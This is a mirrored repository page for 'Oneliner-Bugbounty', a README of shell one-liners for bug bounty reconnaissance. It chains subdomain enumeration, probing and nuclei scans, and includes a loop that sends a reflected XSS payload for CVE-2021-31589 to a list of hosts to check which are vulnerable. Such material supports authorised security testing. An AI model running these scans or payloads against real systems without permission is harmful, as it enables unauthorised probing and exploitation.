daffainfo
/
Oneliner-Bugbounty
mirror of https://github.com/daffainfo/Oneliner-Bugbounty.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
A collection oneliner scripts for bug bounty
4 Commits
1 Branch
0 Tags
37 KiB
Go to file
AdrianMF 241e21e8f3
Update README.md 		2022-04-01 09:55:57 +07:00
README.md Update README.md 2022-04-01 09:55:57 +07:00

README.md

Oneliner-Bugbounty

A collection oneliner scripts for bug bounty

Auto scanner

subfinder -d site.com | httpx | nuclei -t nuclei-templates

Finding files (For example in here .json file)

subfinder -d site.com | httpx | waybackurls | grep -E ".json(?:onp?)?$"

CVE-2021-31589

cat subs.txt | while read host do; do curl -sk "$host/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password" | grep -qs '"><svg/onload=alert(document.domain)>' && echo "$host: Vuln" || echo "$host: Not Vuln"; done